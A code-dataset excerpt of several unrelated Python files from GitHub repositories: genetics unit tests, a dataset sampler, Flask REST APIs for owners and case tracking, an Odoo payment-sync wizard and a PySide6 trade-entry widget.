self.nbit_a.literal\n expected = 
genetics.Binary('0b100111011100')\n self.assertEqual(actual, expected)\n\n def test_crossover(self):\n offspring = self.nbit_a.crossover(self.nbit_b, 2)\n actual = str(offspring[0].literal), str(offspring[1].literal)\n expected = ('0b1000', '0b11011101')\n self.assertEqual(actual, expected)\n\nclass TestNodeString(unittest.TestCase):\n def test_even_open_close(self):\n valid_mock_str = '1(1,2(3,4)),()'\n valid_actual = genetics.NodeString.even_open_close(valid_mock_str)\n valid_expected = '(1,2(3,4))'\n self.assertEqual(valid_actual, valid_expected)\n uneven_mock_str = '1(1,2(3,4),()'\n with self.assertRaises(ValueError):\n genetics.NodeString.even_open_close(uneven_mock_str)\n no_open_mock_str = '1'\n with self.assertRaises(ValueError):\n genetics.NodeString.even_open_close(no_open_mock_str)\n\n def test_parse_first_int(self):\n int_first_mock_str = '12312(1,2,3)'\n int_first_actual = genetics.NodeString.parse_first_int(int_first_mock_str)\n int_first_expected = (12312, '(1,2,3)')\n self.assertEqual(int_first_actual, int_first_expected)\n prematter_mock_str = 'ab(12312(1,2,3)'\n prematter_actual = genetics.NodeString.parse_first_int(prematter_mock_str)\n prematter_expected = (12312, '(1,2,3)')\n self.assertEqual(prematter_actual, prematter_expected)\n\n def test_parse_child(self):\n grand_children_mock_child = '123(2,3(3,4),1),43(1,2)'\n grand_children_actual = genetics.NodeString.parse_child(grand_children_mock_child)\n grand_children_expected = '123(2,3(3,4),1)'\n self.assertEqual(grand_children_actual, grand_children_expected)\n child_mock_child = '23,3(2,3)'\n child_actual = genetics.NodeString.parse_child(child_mock_child)\n child_expected = '23'\n self.assertEqual(child_actual, child_expected)\n no_grandchildren_mock_child = '1,23'\n no_grandchildren_actual = genetics.NodeString.parse_child(no_grandchildren_mock_child)\n no_grandchildren_expected = '1'\n self.assertEqual(no_grandchildren_actual, no_grandchildren_expected)\n single_mock_child = '23'\n single_actual = genetics.NodeString.parse_child(single_mock_child)\n single_expected = '23'\n self.assertEqual(single_actual, single_expected)\n\n def test_parse_children(self):\n nested_mock_children_str = '123(2,3(3,4),1),43(1,2),23,4(3,2)'\n nested_actual = genetics.NodeString.parse_children(nested_mock_children_str)\n nested_expected = ['123(2,3(3,4),1)', '43(1,2)', '23', '4(3,2)']\n self.assertListEqual(nested_actual, nested_expected)\n unnested_mock_children_str = '1,23'\n unnested_actual = genetics.NodeString.parse_children(unnested_mock_children_str)\n unnested_expected = ['1', '23']\n self.assertListEqual(unnested_actual, unnested_expected)\n single_mock_children_str = '1'\n single_actual = genetics.NodeString.parse_children(single_mock_children_str)\n single_expected = ['1']\n self.assertListEqual(single_actual, single_expected)\n mock_children_str = '4(5),3(6,7),7'\n actual = genetics.NodeString.parse_children(mock_children_str)\n expected = ['4(5)', '3(6,7)', '7']\n self.assertListEqual(actual, expected)\n\nclass TestNodeFromString(unittest.TestCase):\n def setUp(self):\n self.mock_tree = genetics.Node(\n children=[\n genetics.Node(children=[\n genetics.Node(nodetype=5)\n ], nodetype=4),\n genetics.Node(children=[\n genetics.Node(nodetype=6),\n genetics.Node(nodetype=7)\n ], nodetype=3),\n genetics.Node(nodetype=7)\n ], nodetype=1\n )\n self.mock_tree_string = 'Node: 1(4(5),3(6,7),7)'\n\n def test_str_(self):\n actual = str(self.mock_tree)\n expected = self.mock_tree_string\n self.assertEqual(actual, expected)\n\n def 
test_from_string(self):\n actual = genetics.Node.from_string(self.mock_tree_string)\n expected = self.mock_tree\n self.assertEqual(str(actual), str(expected))\n\nclass TestNode(unittest.TestCase):\n def test_validate_children(self):\n non_iterable_children = genetics.Node(nodetype=1)\n with self.assertRaises(ValueError):\n genetics.Node(children=non_iterable_children)\n non_node_children = [genetics.Node(nodetype=1), 'a']\n with self.assertRaises(ValueError):\n genetics.Node(children=non_node_children)\n\n def test_depth(self):\n deepest_not_first = genetics.Node.from_string('1(2,3(4,5(2)),4(2(3),4))')\n deepest_not_first_actual = deepest_not_first.depth()\n deepest_not_first_expected = 4\n self.assertEqual(deepest_not_first_actual, deepest_not_first_expected)\n\n def test_pop_child(self):\n pop_index = 1\n mock_node = genetics.Node.from_string('1(2,3(4),2(1,2))')\n returned_actual = mock_node.pop_child(pop_index)\n returned_expected = genetics.Node.from_string('3(4)')\n self.assertEqual(str(returned_actual), str(returned_expected))\n expected_mock_node_after = genetics.Node.from_string('1(2,2(1,2))')\n self.assertEqual(mock_node, expected_mock_node_after)\n\n def test_insert(self):\n insert_index = 1\n child = genetics.Node.from_string('3(4)')\n mock_node = genetics.Node.from_string('1(2,2(1,2))')\n mock_node.insert_child(insert_index, child)\n expected_node_after = genetics.Node.from_string('1(2,3(4),2(1,2))')\n self.assertEqual(mock_node, expected_node_after)\n expected_child_parent = mock_node\n self.assertEqual(child.parent, expected_child_parent) \n\n def test_descendents(self):\n mock_node = genetics.Node.from_string('1(2(3,4),5(6(7),8))')\n actual = [descendent.nodetype for descendent in mock_node.descendents()]\n expected = [1, 2, 3, 4, 5, 6, 7, 8]\n self.assertListEqual(actual, expected)\n\nclass TestBinaryNodeFromString(unittest.TestCase):\n def setUp(self):\n self.mock_binary_tree = genetics.BinaryNode(\n [\n genetics.BinaryNode(\n [\n genetics.BinaryNode(nodetype=1)\n ], nodetype=4),\n genetics.BinaryNode(\n [\n genetics.BinaryNode(\n [\n genetics.BinaryNode(nodetype=3),\n genetics.BinaryNode(nodetype=2)\n ],nodetype=2)\n ], nodetype=4)\n ], nodetype=1\n )\n self.mock_binary_tree_str = 'BinaryNode: 1(4(1),4(2(3,2)))'\n\n def test_from_string(self):\n actual = genetics.BinaryNode.from_string(self.mock_binary_tree_str)\n expected = self.mock_binary_tree_str\n self.assertEqual(str(actual), expected)\n\n def test_str(self):\n actual = str(self.mock_binary_tree)\n expected = self.mock_binary_tree_str\n self.assertEqual(actual, expected)\n\nclass TestBinaryNode(unittest.TestCase):\n def test_validate_children(self):\n non_iterable_children = genetics.Node(nodetype=1)\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=non_iterable_children)\n non_node_children = [genetics.Node(nodetype=1), 'a']\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=non_node_children)\n too_long_children = [\n genetics.Node(nodetype=1),\n genetics.Node(nodetype=2),\n genetics.Node(nodetype=3)\n ]\n with self.assertRaises(ValueError):\n genetics.BinaryNode(children=too_long_children)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"eugeneh1217/sims","sub_path":"sims/agents/test/test_genetics.py","file_name":"test_genetics.py","file_ext":"py","file_size_in_byte":14340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13844978701","text":"import os, sys\nfrom shutil import rmtree, copyfile\nimport 
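The tests above pin down the `Binary` conversions: the int 6, the string `'0b110'`, and the uint8 array `[1, 1, 0]` all denote the same value. A sketch of those three conversions with numpy — an illustration of the contract the tests describe, not the project's actual implementation:

```python
import numpy as np

def int_to_bits(n):
    return np.array([int(c) for c in np.binary_repr(n)], dtype=np.uint8)

def bits_to_str(bits):
    return '0b' + ''.join(str(b) for b in bits)

def bits_to_int(bits):
    return int(bits_to_str(bits), 2)   # int() accepts the 0b prefix with base 2

bits = int_to_bits(6)
assert bits_to_str(bits) == '0b110'
assert bits_to_int(bits) == 6
np.testing.assert_array_equal(bits, np.array([1, 1, 0], dtype=np.uint8))
```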
numpy as np\nfrom tqdm import tqdm\n\ndef getPath():\n return os.path.dirname(os.path.abspath(__file__))\n\ndef getDatesetPath():\n return getPath() + '/images1024x1024'\n\ndef sample(train_size, valid_size, init=True):\n\n if not (0 <= train_size <= 70000 and 0 <= valid_size <= 70000):\n raise ValueError('ValueError: sample: Size must be integer between 0~70000')\n\n train_set_path = f'{getPath()}/train_set'\n valid_set_path = f'{getPath()}/valid_set'\n\n def initSampler():\n for dir in [train_set_path, valid_set_path]:\n if os.path.isdir(dir):\n rmtree(dir)\n os.mkdir(train_set_path)\n os.mkdir(train_set_path+'/ori')\n\n os.mkdir(valid_set_path)\n os.mkdir(valid_set_path+'/ori')\n\n def index2path(index):\n filename = str(index).zfill(5) + '.png'\n filename = filename[0:2] + \"000/\" + filename\n return f'{getDatesetPath()}/{filename}'\n\n if init: \n initSampler()\n\n full_index = np.random.permutation(70000)\n train_index = full_index[:train_size]\n valid_index = full_index[-valid_size:]\n\n\n for (dir, index) in [(train_set_path, train_index), (valid_set_path, valid_index)]:\n for i, id in tqdm(enumerate(index), desc=dir[-9:]):\n src_path = index2path(id)\n copyfile(src_path, f'{dir}/ori/{str(i).zfill(5)}.png')\n\nif __name__ == '__main__':\n\n try:\n if len(sys.argv) != 3:\n raise ValueError('Usage: python3 dataset-slicer.py ')\n\n train_size = int(sys.argv[1])\n valid_size = int(sys.argv[2])\n\n if not (0 <= train_size <= 70000 and 0 <= valid_size <= 70000):\n raise ValueError('Error: Size must be integer between 0~70000')\n\n if not os.path.isdir(getDatesetPath()): \n raise ValueError(\"Error: Dataset directory doesn't exist.\")\n \n sample(train_size, valid_size)\n\n\n except ValueError as e:\n print(e)\n exit()\n","repo_name":"SaintWatson/Face-Renovation-Project","sub_path":"dataset/DataSampler.py","file_name":"DataSampler.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"5735968231","text":"# coding=utf-8\nfrom flask import Flask, jsonify, request\nfrom flask_restful import Resource, Api, reqparse\nfrom pymongo import MongoClient\nimport json\n\napp = Flask(__name__)\napi = Api(app)\n\nclienteMongo = MongoClient('localhost', 27017)\ndb = clienteMongo['usuariosDB']\ndbPropetarios = db.propetarios\n\nclass Propetario(Resource):\n \"\"\"This is the class propert.\"\"\"\n @app.route(methods=['POST'])\n def post(self):\n \"\"\"Return the Objects insert\"\"\"\n json_data = request.get_json(force=True)\n idC = json_data['idP']\n estadoActual = json_data['EstadoActual']\n healthCheck = json_data['HealthCheck']\n horarios = json_data['Horarios']\n propetarios = json_data['Propetarios']\n guardar = {\n 'idC': idC,\n 'EstadoActual': estadoActual,\n 'HealthCheck': healthCheck,\n 'Horarios': horarios,\n 'Propetarios': propetarios\n }\n dbPropetarios.insert_one(guardar).inserted_id\n return jsonify(idH=idC, EstadoActual=estadoActual, HealthCheck=healthCheck, Horarios=horarios,\n Propetarios=propetarios)\n\n\napi.add_resource(Propetario, '/propetarios')\n# api.add_resource(PropetarioID, '/propetarios/')\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"dfriveros11/Arquisoft","sub_path":"TypesOfUsers/Propetario.py","file_name":"Propetario.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8354172314","text":"from metricbeat.metricbeat import BaseTest\n\nclass 
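`DataSampler.py` above slices train indices from the front of one permutation and valid indices from the back, so the two sets can overlap once `train_size + valid_size` exceeds 70000. A sketch that slices the same permutation without overlap (pool shrunk to 100 here so the example runs instantly):

```python
import numpy as np

def split_indices(pool, train_size, valid_size, seed=0):
    if train_size + valid_size > pool:
        raise ValueError('requested more samples than the pool holds')
    idx = np.random.default_rng(seed).permutation(pool)
    return idx[:train_size], idx[train_size:train_size + valid_size]

train, valid = split_indices(100, 70, 20)
assert len(set(train) & set(valid)) == 0   # disjoint by construction
```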
Test(BaseTest):\n\n def test_base(self):\n \"\"\"\n Basic test with exiting Mockbeat normally\n \"\"\"\n self.render_config_template(\n )\n\n proc = self.start_beat()\n self.wait_until( lambda: self.log_contains(\"Init Beat\"))\n exit_code = proc.kill_and_wait()\n assert exit_code == 0\n","repo_name":"jasperla/hwsensorsbeat","sub_path":"vendor/github.com/elastic/beats/metricbeat/tests/system/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"16677543235","text":"from datetime import datetime\n\nfrom flask_restful import Resource\nfrom flask import request\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\n\nfrom models.case import CaseModel\nfrom models.case_history import CaseHistoryModel\n\nstatuses = { # dict of allowed statuses of cases\n 'New': 1,\n 'Planned': 2,\n 'In progress': 3,\n 'Completed': 4\n}\n\nlogs = [] # list of temporary logs, that not commited yet.\n\n\ndef logging_of_editing(field: str, old: str, new: str, case_id: int):\n \"\"\"\n Create record of changing in case table and append to logs list\n :param field: Changed field\n :param old: Old value\n :param new: New value\n :param case_id: Id of case, that has changed\n \"\"\"\n operation = field + \": '\" + old + \"' -> '\" + new + \"'.\"\n new_log = CaseHistoryModel(operation, case_id)\n new_log.save_to_db()\n logs.append(new_log)\n\n\ndef commit_of_logging():\n \"\"\"\n Commit saved all logs from logs-list.\n Clear up logs-list.\n \"\"\"\n for log in logs:\n log.commit_changes()\n logs.clear()\n\n\ndef abort_of_logging():\n \"\"\"\n Abort commiting of logs\n \"\"\"\n logs.clear()\n\n\nclass Case(Resource):\n @jwt_required\n def get(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: GET\n\n Headers: Authorization - \"Bearer {{access_token}}\"\n Input: {\n \"status\": \"new/planned/in_progress/completed\" (optional)\n \"end_time\": \"Hour:Minutes Day.Month.Year\" (optional)\n }\n :return: List of cases\n \"\"\"\n data = request.get_json() # get data from request\n try:\n user = get_jwt_identity() # get user id\n if not data: # setting up an empty dict if no parameters in request\n data = {}\n\n if \"end_time\" not in data:\n data['end_time'] = \"%%\" # setting as \"any\"-format for sql-request\n else:\n try:\n data['end_time'] = str(datetime.strptime(data['end_time'], '%H:%M:%S %d.%m.%Y'))\n except:\n return {'message': 'Incorrect datetime format'}, 400\n\n if \"status\" not in data:\n data['status'] = \"%%\" # setting as \"any\"-format for sql-request\n elif data['status'] in statuses:\n data['status'] = statuses[data['status']] # setting as status_id\n else:\n return {'message': \"Wrong status format. 
\"\n \"Available statuses: New, Planned, In progress, Completed\"}, 400\n cases = [case.json() for case in CaseModel.find_all_by_user_id(user, data['status'], data['end_time'])]\n return {'cases': cases}, 200\n except:\n return {'message': 'Internal server error'}, 500\n\n @jwt_required\n def post(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: POST\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\",\n \"description\": \"some description\"\n \"end_time\": \"Hour:Minutes Day.Month.Year\",\n }\n :return: JSON of created case.\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n if len(data['name']) > 30:\n return {'message': \"Name is too long. Max length is 30 symbols\"}, 400\n if CaseModel.find_by_name_and_user_id(data['name'], user):\n return {'message': \"An case with name '{}' already exists.\".format(data['name'])}, 400\n if len(data['description']) > 256:\n return {'message': \"Description is too long. Max length is 256 symbols\"}, 400\n\n try:\n end_time = datetime.strptime(data['end_time'], '%H:%M:%S %d.%m.%Y')\n except:\n return {'message': 'Incorrect datetime format'}, 400\n\n if end_time < datetime.now():\n return {'message': \"This end_time has passed.\"}\n else:\n data['end_time'] = str(end_time)\n case = CaseModel(**data, user_id=user)\n\n try:\n case.save_to_db()\n except:\n return {\"message\": \"An error occurred inserting the case.\"}, 500\n logging_of_editing('Creating', '', data['name'], case.id)\n commit_of_logging()\n except:\n abort_of_logging()\n return {'message': 'Internal server error'}, 500\n return case.json(), 201\n\n @jwt_required\n def delete(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: DELETE\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\"\n }\n :return: JSON of report message\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n case.delete_from_db()\n return {'message': 'Case deleted.'}\n return {'message': 'Case not found.'}, 404\n except:\n return {'message': 'Internal server error'}, 500\n\n @jwt_required\n def put(self):\n \"\"\"\n URL: http://{{server_url}}/case\n METHOD: PUT\n\n Updates received fields and logging changes to case_history table\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\",\n \"new_name\": \"new name of the case\" (optional)\n \"new_description\": \"some new some description\" (optional)\n \"new_status\": \"new/planned/in_progress/completed\", (optional)\n \"new_end_time\": \"Hour:Minutes Day.Month.Year\", (optional)\n }\n :return: JSON of edited case\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n if 'new_name' in data:\n if len(data['new_name']) > 30:\n return {'message': \"New name is too long. 
Max length is 30 symbols\"}, 400\n if CaseModel.find_by_name_and_user_id(data['new_name'], user):\n return {'message': \"An case with name '{}' already exists.\".format(data['new_name'])}, 400\n if case.name != data['new_name']:\n logging_of_editing(field='Name', old=case.name, new=data['new_name'], case_id=case.id)\n case.name = data['new_name']\n\n if 'new_description' in data:\n if len(data['new_description']) > 256:\n return {'message': \"New description is too long. Max length is 256 symbols\"}, 400\n if case.description != data['new_description']:\n logging_of_editing(field='Description', old=case.description, new=data['new_description'],\n case_id=case.id)\n case.description = data['new_description']\n\n if 'new_status' in data:\n if data['new_status'] in statuses:\n if case.status_id != statuses[data['new_status']]:\n logging_of_editing(field='Status', old=case.status.name, new=data['new_status'],\n case_id=case.id)\n case.status_id = statuses[data['new_status']]\n else:\n return {'message': \"Wrong status format. \"\n \"Available statuses: New, Planned, In progress, Completed\"}, 400\n\n if 'new_end_time' in data:\n try:\n new_end_time = datetime.strptime(data['new_end_time'], '%H:%M:%S %d.%m.%Y')\n except:\n return {'message': 'Incorrect datetime format'}, 400\n if new_end_time < case.start_time:\n return {'message': \"This new end_time has passed.\"}\n else:\n if str(case.end_time) != str(new_end_time):\n logging_of_editing(field='end_time', old=str(case.end_time), new=str(new_end_time),\n case_id=case.id)\n case.end_time = str(new_end_time)\n\n else:\n return {'message': 'Case not found.'}, 404\n try:\n case.save_to_db()\n commit_of_logging()\n except:\n abort_of_logging()\n return {\"message\": \"An error occurred updating the case.\"}, 500\n except:\n abort_of_logging()\n return {'message': 'Internal server error'}, 500\n return case.json()\n\n\nclass CaseHistory(Resource):\n @classmethod\n @jwt_required\n def post(cls):\n \"\"\"\n URL: http://{{server_url}}/case_history\n METHOD: POST\n\n Headers:\n Content-Type: application/json\n Authorization: \"Bearer {{access_token}}\"\n\n Input: {\n \"name\": \"name of the required case\"\n }\n :return: JSON of history of case.\n \"\"\"\n data = request.get_json()\n try:\n user = get_jwt_identity()\n case = CaseModel.find_by_name_and_user_id(data['name'], user)\n if case:\n case_id = case.id\n case_history = [history.json() for history in CaseHistoryModel.find_all_by_case_id(case_id)]\n return {'history': case_history}, 200\n else:\n return {'message': 'Case not found'}, 404\n except:\n return {'message': 'Internal server error'}, 500\n","repo_name":"sapiely/test_exercise","sub_path":"resources/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":10102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6677123911","text":"import sys\nfrom collections import defaultdict\n\nINVALID_CHARS = ',:;.()[]{}'\ndef clear(w):\n\treturn w.strip(INVALID_CHARS)\n\nm = defaultdict(int)\nfor line in sys.stdin:\n\tfor word in line.split():\n\t\tm[clear(word)] += 1\n\nfor item in sorted(m.items(), key=lambda item: item[1], reverse=True):\n\tprint(item[0], item[1])\n","repo_name":"lbolla/stanford-cs240h","sub_path":"lab1/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1200889344","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, fields, 
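`lab1.py` above builds its frequency map by hand with a plain dict; `collections.Counter` expresses the same stdin word count in a few lines. Same stripping rule and descending sort as the source (ordering among equal counts may differ):

```python
import sys
from collections import Counter

INVALID_CHARS = ',:;.()[]{}'

def word_counts(lines):
    return Counter(w.strip(INVALID_CHARS) for line in lines for w in line.split())

if __name__ == '__main__':
    for word, n in word_counts(sys.stdin).most_common():   # count-descending
        print(word, n)
```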
models\nfrom odoo.exceptions import ValidationError\n\ntry:\n import erppeek\nexcept Exception:\n raise ValidationError('La libraire de synchronisation est manquante!')\n\n\nclass AccountPaymentSynch(models.TransientModel):\n _name = 'account.payment.synch'\n\n def synchronise_payment(self):\n active_ids = self._context.get('active_ids')\n payment_ids = self.env['account.payment'].search([('id', 'in', active_ids)])\n\n\n SERVER = self.env.user.company_id.second_base_url\n client = erppeek.Client(server=SERVER)\n try:\n client.login(database=self.env.user.company_id.db_name,\n user=self.env.user.company_id.admin_user, password=self.env.user.company_id.admin_password)\n except Exception as e:\n raise ValidationError('Erreur de connection à la deuxième base')\n\n for payment in payment_ids:\n # verifier si la facture n'est pas deja synchronisée\n\n sync_payment = client.search('account.payment', [('synch_id', '=', payment.id)])\n # Préparation du dictionnaire de la facture\n if not sync_payment:\n vals= {\n 'payment_date': payment.payment_date,\n 'amount': payment.amount,\n \"payment_type\": payment.payment_type,\n \"partner_type\": payment.partner_type,\n \"communication\": payment.communication,\n 'name': payment.name,\n 'synch_id': payment.id\n }\n\n payment_partner = payment.partner_id\n # Rechercher le partenaire sinon le créer\n\n partner_id = client.search('res.partner', [('synch_id', '=', payment_partner.id)])\n if partner_id:\n vals['partner_id'] = partner_id[0]\n else:\n partner = client.create('res.partner',{'name': payment_partner.name,\n 'street': payment_partner.street,\n 'street2': payment_partner.street2,\n 'city': payment_partner.city,\n 'phone': payment_partner.phone,\n 'mobile': payment_partner.mobile,\n 'email': payment_partner.email,\n 'ref': payment_partner.ref,\n 'synch_id': payment_partner.id,\n 'supplier_rank': payment_partner.supplier_rank,\n 'customer_rank': payment_partner.customer_rank,\n 'zip': payment_partner.zip,\n 'country_id': payment_partner.country_id and payment_partner.country_id.id,\n\n })\n vals['partner_id'] = partner.id\n\n\n\n if payment.journal_id:\n # Rechercher le journal sinon le créer\n\n journal_id = client.search('account.journal', [('name', '=', payment.journal_id.name)])\n\n if journal_id:\n vals['journal_id'] = journal_id[0]\n else:\n raise ValidationError(\"Le journal %s n'a pa pu être reperé dans la base de destination!\" % payment.journal_id.name)\n if payment.currency_id:\n # Rechercher le journal sinon le créer\n\n currency = client.search('res.currency', [('name', '=', payment.currency_id.name)])\n\n if currency:\n vals['currency_id'] = currency[0]\n else:\n raise ValidationError(\"La devise %s n'a pa pu être reperé dans la base de destination!\" % payment.currency_id.name)\n\n payment_method = client.search('account.payment.method',[('code', '=', 'manual'), ('payment_type', '=', payment.payment_type)])\n vals['payment_method_id'] = payment_method[0]\n new_payment = client.create('account.payment',vals)\n payment.synch_id = new_payment\n if payment.state not in ('draft', 'cancelled'):\n print('payment.invoice_ids', payment.reconciled_invoice_ids)\n if payment.reconciled_invoice_ids:\n invoices = client.search('account.move', [('synch_id', 'in', payment.reconciled_invoice_ids.mapped('id'))])\n print('invoices', invoices)\n if len(invoices)>0:\n\n client.write('account.payment', new_payment, {'invoice_ids': invoices})\n\n\n client.execute('account.payment', 'post', new_payment)\n return 
True","repo_name":"mouadhamri/hbsolutions_sync","sub_path":"accounting_synch/wizard/account_payment_synch.py","file_name":"account_payment_synch.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9995306161","text":"from datetime import datetime\nfrom dateutil import tz\n\nfrom PySide6.QtCore import Qt\nfrom PySide6.QtWidgets import QLabel, QDateTimeEdit, QDateEdit, QLineEdit\nfrom jal.widgets.abstract_operation_details import AbstractOperationDetails\nfrom jal.widgets.reference_selector import AccountSelector, AssetSelector\nfrom jal.widgets.delegates import WidgetMapperDelegateBase\nfrom jal.db.operations import LedgerTransaction\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TradeWidgetDelegate(WidgetMapperDelegateBase):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.delegates = {'timestamp': self.timestamp_delegate,\n 'settlement': self.timestamp_delegate,\n 'asset_id': self.symbol_delegate,\n 'qty': self.decimal_long_delegate,\n 'price': self.decimal_long_delegate,\n 'fee': self.decimal_long_delegate}\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass TradeWidget(AbstractOperationDetails):\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.name = self.tr(\"Buy / Sell\")\n self.operation_type = LedgerTransaction.Trade\n\n self.date_label = QLabel(self)\n self.settlement_label = QLabel()\n self.number_label = QLabel(self)\n self.account_label = QLabel(self)\n self.symbol_label = QLabel(self)\n self.qty_label = QLabel(self)\n self.price_label = QLabel(self)\n self.fee_label = QLabel(self)\n self.comment_label = QLabel(self)\n\n self.main_label.setText(self.name)\n self.date_label.setText(self.tr(\"Date/Time\"))\n self.settlement_label.setText(self.tr(\"Settlement\"))\n self.number_label.setText(self.tr(\"#\"))\n self.account_label.setText(self.tr(\"Account\"))\n self.symbol_label.setText(self.tr(\"Asset\"))\n self.qty_label.setText(self.tr(\"Qty\"))\n self.price_label.setText(self.tr(\"Price\"))\n self.fee_label.setText(self.tr(\"Fee\"))\n self.comment_label.setText(self.tr(\"Note\"))\n\n self.timestamp_editor = QDateTimeEdit(self)\n self.timestamp_editor.setCalendarPopup(True)\n self.timestamp_editor.setTimeSpec(Qt.UTC)\n self.timestamp_editor.setFixedWidth(self.timestamp_editor.fontMetrics().horizontalAdvance(\"00/00/0000 00:00:00\") * 1.25)\n self.timestamp_editor.setDisplayFormat(\"dd/MM/yyyy hh:mm:ss\")\n self.settlement_editor = QDateEdit(self)\n self.settlement_editor.setCalendarPopup(True)\n self.settlement_editor.setTimeSpec(Qt.UTC)\n self.settlement_editor.setFixedWidth(self.settlement_editor.fontMetrics().horizontalAdvance(\"00/00/0000\") * 1.5)\n self.settlement_editor.setDisplayFormat(\"dd/MM/yyyy\")\n self.account_widget = AccountSelector(self)\n self.asset_widget = AssetSelector(self)\n self.qty_edit = QLineEdit(self)\n self.qty_edit.setAlignment(Qt.AlignRight)\n self.price_edit = QLineEdit(self)\n self.price_edit.setAlignment(Qt.AlignRight)\n self.fee_edit = QLineEdit(self)\n self.fee_edit.setAlignment(Qt.AlignRight)\n self.number = QLineEdit(self)\n self.comment = QLineEdit(self)\n\n self.layout.addWidget(self.date_label, 1, 0, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.account_label, 2, 0, 1, 1, Qt.AlignLeft)\n 
self.layout.addWidget(self.symbol_label, 3, 0, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.comment_label, 4, 0, 1, 1, Qt.AlignLeft)\n\n self.layout.addWidget(self.timestamp_editor, 1, 1, 1, 1, Qt.AlignLeft)\n self.layout.addWidget(self.account_widget, 2, 1, 1, 4)\n self.layout.addWidget(self.asset_widget, 3, 1, 1, 4)\n self.layout.addWidget(self.comment, 4, 1, 1, 4)\n\n self.layout.addWidget(self.settlement_label, 1, 2, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.settlement_editor, 1, 3, 1, 1, Qt.AlignLeft)\n\n self.layout.addWidget(self.number_label, 1, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.qty_label, 2, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.price_label, 3, 5, 1, 1, Qt.AlignRight)\n self.layout.addWidget(self.fee_label, 4, 5, 1, 1, Qt.AlignRight)\n\n self.layout.addWidget(self.number, 1, 6, 1, 1)\n self.layout.addWidget(self.qty_edit, 2, 6, 1, 1)\n self.layout.addWidget(self.price_edit, 3, 6, 1, 1)\n self.layout.addWidget(self.fee_edit, 4, 6, 1, 1)\n\n self.layout.addWidget(self.commit_button, 0, 8, 1, 1)\n self.layout.addWidget(self.revert_button, 0, 9, 1, 1)\n\n self.layout.addItem(self.verticalSpacer, 6, 6, 1, 1)\n self.layout.addItem(self.horizontalSpacer, 1, 6, 1, 1)\n\n super()._init_db(\"trades\")\n self.mapper.setItemDelegate(TradeWidgetDelegate(self.mapper))\n\n self.account_widget.changed.connect(self.mapper.submit)\n self.asset_widget.changed.connect(self.mapper.submit)\n\n self.mapper.addMapping(self.timestamp_editor, self.model.fieldIndex(\"timestamp\"))\n self.mapper.addMapping(self.settlement_editor, self.model.fieldIndex(\"settlement\"))\n self.mapper.addMapping(self.account_widget, self.model.fieldIndex(\"account_id\"))\n self.mapper.addMapping(self.asset_widget, self.model.fieldIndex(\"asset_id\"))\n self.mapper.addMapping(self.number, self.model.fieldIndex(\"number\"))\n self.mapper.addMapping(self.qty_edit, self.model.fieldIndex(\"qty\"))\n self.mapper.addMapping(self.price_edit, self.model.fieldIndex(\"price\"))\n self.mapper.addMapping(self.fee_edit, self.model.fieldIndex(\"fee\"))\n self.mapper.addMapping(self.comment, self.model.fieldIndex(\"note\"))\n\n self.model.select()\n\n def prepareNew(self, account_id):\n new_record = super().prepareNew(account_id)\n new_record.setValue(\"timestamp\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"settlement\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"number\", '')\n new_record.setValue(\"account_id\", account_id)\n new_record.setValue(\"asset_id\", 0)\n new_record.setValue(\"qty\", '0')\n new_record.setValue(\"price\", '0')\n new_record.setValue(\"fee\", '0')\n new_record.setValue(\"note\", None)\n return new_record\n\n def copyToNew(self, row):\n new_record = self.model.record(row)\n new_record.setNull(\"id\")\n new_record.setValue(\"timestamp\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"settlement\", int(datetime.now().replace(tzinfo=tz.tzutc()).timestamp()))\n new_record.setValue(\"number\", '')\n return 